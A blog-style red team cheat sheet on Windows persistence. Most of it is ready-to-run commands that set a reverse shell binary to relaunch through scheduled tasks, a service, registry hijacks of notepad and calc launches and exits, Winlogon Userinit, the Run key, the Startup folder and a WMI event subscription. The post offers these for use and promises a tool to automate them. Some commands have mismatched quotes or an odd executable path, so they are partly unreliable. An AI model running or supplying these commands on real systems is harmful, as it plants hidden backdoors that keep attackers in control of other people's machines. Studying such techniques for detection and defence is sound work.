Introducing a new article featuring a CheatSheet for achieving persistence in Windows systems. We'll explore various methods to accomplish this and conclude with a custom C++ tool I developed to automate the process.
Windows Red Team Persistence Techniques
This guide is part of the HackerSploit Red Team series of guides. To navigate to other guides in the series, visit here
Persistence involves methods adversaries employ to maintain access to systems despite restarts, credential changes, or other disruptions that might terminate their access. These methods encompass any access, action, or configuration modifications that enable them to sustain their presence, such as substituting or manipulating legitimate code or inserting startup code.
In simpler terms, persistence lets you keep access or continue controlling a target computer whenever you want, even after it’s been turned off and on again, without needing to reinfect the device to regain your shell.
- Scheduled Tasks
- Services
- Close App
- Open App
- WinLogon
- Run Register
- Startup Folder
- WMIC
Using scheduled tasks is one of the easiest methods to maintain persistence. Although it's more likely to be detected by users, most average users typically don't notice it.
To create this i need to use schtasks:
To create new task:
schtasks /CREATE /SC MINUTE /TN "Reverse Shell" /TR "C:\Users\s12de\Downloads\shell.exe"
What is a Windows Service? - Definition from Techopedia
A Windows service is an application that usually serves a core operating system function running in the background, visit here
Windows services are essential parts of the operating system, responsible for handling tasks like memory, device management, user credentials, preferences, and third-party applications. They function similarly to Unix daemons.
To start we need powershell instance:
A new service is created with an automatic startup type, configured to execute the binary specified in the BinaryPathName field.
New-Service -Name "s12" -BinaryPathName "C:\Users\s12de\Downloads\shell.exe" -Description "PersistenceWindows" -StartupType Automatic
And now start the service:
sc start s12
This next method is my favorite — it allows your binary to execute whenever a specific process or binary is closed. In this example, a reverse shell is triggered when the user terminates the notepad.exe process.
To do this we need to execute 3 commands in cmd:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\Users\s12de\Downloads\shell.exe"
Result:
When i close notepad automatically i receive the reverse shell
This next method is my second favorite — it allows your binary to execute whenever a specific process or binary is launched. In this case, a reverse shell is triggered when the user opens the calc.exe process.
To do this we need to execute 2 commands in cmd:
copy calc.exe _calc.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v Debugger /t reg_sz /d "cmd /C _calc.exe & C:\Users\s12de\Downloads\shell.exe /f
Result:
When user open calculator i receive reverse shell connection.
Persistence — Winlogon Helper DLL
Winlogon is a Windows component which handles various activities such as the Logon, Logoff, loading user profile during. pentestlab.blog
Winlogon is a core Windows component responsible for handling actions like logon, logoff, user profile loading during authentication, shutdown, and the lock screen. These behaviors are controlled through the registry, which specifies processes to launch during the logon sequence. From a red team perspective, these events present an opportunity to trigger arbitrary payloads for persistence.
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit
Now, create a new registry query that executes your shell.exe each time the user logs in, logs out, or locks the screen.
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\Users\s12de\Downloads\shell.exe" /f
Result:
Register Key are modified!
Structure of the Registry - Win32 apps
The registry is a hierarchical database that contains data that is critical for the operation of Windows. learn.microsoft.com
The Windows Registry is a hierarchical database essential to the functioning of the operating system, as well as the applications and services running on it. Structured like a tree, each node is referred to as a 'key', which can hold both subkeys and data entries known as 'values'.
In this case, it's time to use the Run registry key — one of the most significant keys in the Windows system. The advantage here is that you don't need administrator privileges to execute your binary using this method.
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v S12 /t REG_SZ /d "C:\Users\s12de\Downloads\shell.exe"
Result:
After a reboot or user logon, the Windows operating system executes executable files located in the Startup folder. Typically, these files include the following:
C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupIn this case, you only need to run a single command, which simply copies the malicious binary to this path:
copy "shell.exe" "C:\Users\s12de\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\shell.exe"
Persistence - WMI Event Subscription Windows Management Instrumentation (WMI) enables system administrators to perform tasks locally and remotely. pentestlab.blog
Windows Management Instrumentation (WMI) allows system administrators to manage tasks both locally and remotely. From a red team perspective, WMI can be leveraged for various activities such as lateral movement, persistence, situational awareness, code execution, and even as a command and control (C2) mechanism. Since WMI is a built-in component present in nearly all Windows operating systems (from Windows 98 to Windows 10), it enables these offensive actions to remain under the radar of blue team defenses.
The executable will initiate a reverse shell session within 60 seconds of each reboot.
In this case i need to execute 3 commands:
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="persistence", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="persistence", ExecutablePath="C:\windows\system32\tita.exe",CommandLineTemplate="C:\Users\s12de\Downloads\shell.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="persistence"", Consumer="CommandLineEventConsumer.Name="persistence""
That concludes today’s article. I believe this cheat sheet will be highly useful, and I'm also developing a C++ tool to automate the entire process. Stay tuned to my GitHub for updates.
Thanks for reading! :D
-Malforge Group.